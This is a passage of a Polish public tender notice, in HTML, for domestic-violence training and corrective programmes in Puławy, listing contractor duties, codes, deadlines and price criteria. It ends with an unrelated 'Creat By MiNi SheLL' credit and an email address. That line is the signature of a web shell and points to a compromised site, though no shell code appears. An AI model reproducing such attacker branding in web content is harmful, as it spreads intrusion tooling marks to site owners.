*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne( które będą zatwierdzone przez koordynatora projektu)  wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np. CD, DVD , pamięć USB karta pamięci);
*	 przygotuje i wydrukuje oraz wręczy uczestnikom świadectwa ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych dla mężczyzn stosujących przemoc.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne (3 dni).
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: jedna grupa 10 - osobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  luty 2015r
Liczba osób prowadzących szkolenie: 1 osoba.
Uczestnicy szkolenia: mężczyźni stosujący przemoc - uczestnicy programu korekcyjno - edukacyjnego.
W ramach usługi szkoleniowej wykonawca:

*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt, zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata  w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń        o ukończeniu terapii, ksero zaświadczeń ologowanych, ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne( które będą zatwierdzone przez koordynatora projektu)  wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Program korekcyjno - edukacyjny dla osób stosujących przemoc w rodzinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania Programu: przez okres sześciu miesięcy w wymiarze 24 spotkań każde po 3 godziny dydaktyczne raz w tygodniu - łącznie 72 godziny dydaktyczne.
Czas zajęć: 3 godziny dydaktyczne raz w tygodniu w porze dostosowanej do możliwości uczestników.
Liczba grup: jedna grupa 10 - osobowa.
Miejsce realizacji programu: Puławy.
Termin:  marzec-sierpień 2015 r.
Liczba osób prowadzących program: 2 osoby - kobieta i mężczyzna.
Uczestnicy programu: mężczyźni stosujący przemoc w rodzinie z terenu Puław.

W ramach usługi wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	w czasie trwania Programu, jest obowiązany przedkładać Zamawiającemu miesięczne sprawozdania z wykonania Programu, zawierające tematy realizowanych zajęć, sposoby ich realizacji oraz listę osób, które wzięły udział  w zajęciach. 
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych, ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD, pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupy robocze w praktyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne dla każdej z trzech grup  - łącznie 72 godz. dydaktyczne.
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: 3 grupy, każda po 20 osób.
Miejsce szkolenia: Puławy.
Termin szkolenia:  luty 2015r.
Liczba osób prowadzących szkolenie: 2 osoby.
Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie w zakresie znowelizowanej ustawy o przeciwdziałaniu przemocy w rodzinie i procedury Niebieskie Karty

W ramach usługi szkoleniowej wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pomoc dziecku krzywdzonemu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne.
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: jedna grupa 20-osobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  kwiecień 2015 r.
Liczba osób prowadzących szkolenie: 1 osoba.

Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie szczególnie w obszarze pomocy dzieciom krzywdzonym.

W ramach usługi szkoleniowej wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy pot  polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Strategie udzielania pomocy osobie dorosłej doznającej przemocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne.
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: jedna grupa 20-osobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  marzec 2015 r.
Liczba osób prowadzących szkolenie: 1 osoba.
Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie.

W ramach usługi szkoleniowej wykonawca:

*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Strategie postępowania z osobami stosującymi przemoc.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne.
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: jedna grupa 20-osobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  marzec 2015 r.
Liczba osób prowadzących szkolenie: 1 osoba.
Uczestnicy szkolenia: przedstawiciele różnych służb lokalnych działających na rzecz przeciwdziałania przemocy w rodzinie.

W ramach usługi szkoleniowej wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	zapewni jeden gorący posiłek każdego dnia szkolenia dla każdego uczestnika (co najmniej drugie danie);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na   dowolnym nośniku danych. (np CD, DVD, pamięć USB karta pamięci);
*	 przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com